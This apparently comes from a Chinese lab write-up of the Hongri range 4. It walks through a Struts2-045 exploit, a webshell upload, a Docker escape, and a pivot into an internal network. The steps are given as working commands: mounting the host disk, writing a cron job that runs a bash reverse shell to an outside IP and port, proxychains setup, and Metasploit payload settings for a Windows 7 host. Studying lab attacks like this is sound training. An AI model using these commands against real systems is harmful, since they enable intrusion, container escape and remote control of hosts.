红日靶场4

 · 2021-9-30 · 次阅读


靶场启动:ubuntu:ubuntu

douser:Dotest123

DC:

  • administrator:Test2008

启动docker环境:

sudo docker-compose up

Struts2-045

一把梭哈,反弹shell:

image-20210930141754246

呃。docker环境。

先用工具传个冰蝎马:

image-20210930142841156

尝试docker逃逸漏洞:

当docker容器内拥有宿主机文件读写权限时,可以通过写ssh密钥、计划任务等方式进行逃逸。

查看磁盘文件:fdisk -l

呃。。s2-045这个好像没法。fdisk -l执行没反应。

把tomcat环境也启动来:

image-20210930144155271

OK重新上冰蝎:

重新来:查看磁盘文件:fdisk -l

image-20210930144309775

这哈有了。

然后是新建目录用来挂载文件:

将宿主机/dev/sda1 目录挂载至容器内 /test: mount /dev/sda1 /test

已经能获取宿主机的目录:

image-20210930144734970

然后就是写定时任务反弹shell脚本:

touch /test/tmp/test.sh
chmod +x /test/tmp/test.sh
echo "#!/bin/bash" >> /test/tmp/test.sh
echo "/bin/bash -i >& bash -i >& /dev/tcp/192.168.43.133/8888 0>&1"  >> /test/tmp/test.sh
echo "bash -i >& /dev/tcp/192.168.43.133/8888 0>&1"  >> /test/tmp/test.sh
或者
sed -i '$a\/bin/bash -i  >&  bash -i >& /dev/tcp/192.168.32.128/13122 0>&1' /test/tmp/test.sh

cat /test/tmp/test.sh
写入定时任务:
sed -i '$a*/2 *    * * *    root  bash /tmp/test.sh ' /test/etc/crontab
cat /test/etc/crontab

image-20210930145341768

这儿有个坑点,冰蝎的命令执行写不进去:

我把shell弹到kali可以写:

image-20210930152927577

image-20210930153051986

然后kali监听8888等shell:

image-20210930153211941

成了。逃逸出来了。

image-20210930153300525

这儿网卡没配置好,应该内网单独一个段。

image-20211220144258750

发现存在ubuntu用户。

查看下root用户的history:

image-20211220144409448

没啥用。看一下ubuntu用户的:

image-20211220144524515

发现存在用户名和密码信息。

接下来需要收集内网其他IP信息:

arp -a和ifconfig:

image-20211220144623700

下面这个是内网段。

image-20211220152126026

从arp路由看出来存在另一个内网IP192.168.108.131

传一个fscan扫描一下

使用wget传输文件:

image-20211220152749135

然后直接用:

image-20211220153104794

得搭建个内网穿透做代理,然后kali上面打。

用nps吧。搭建好了后,配置下kali的proxychains配置。

vi /etc/proxychains.conf

image-20211220164811552

然后直接msf打如上,先扫描存在,然后是win7挑一个打:

proxychains4 msfconsole

然后设置payload:

set rhost 192.168.108.129   win7
set payload windows/x64/meterpreter/bind_tcp
#set payload windows/meterpreter/reverse_tcp

直接run

image-20211220170502051

拿下来了。代理有问题,,run好多次才下来。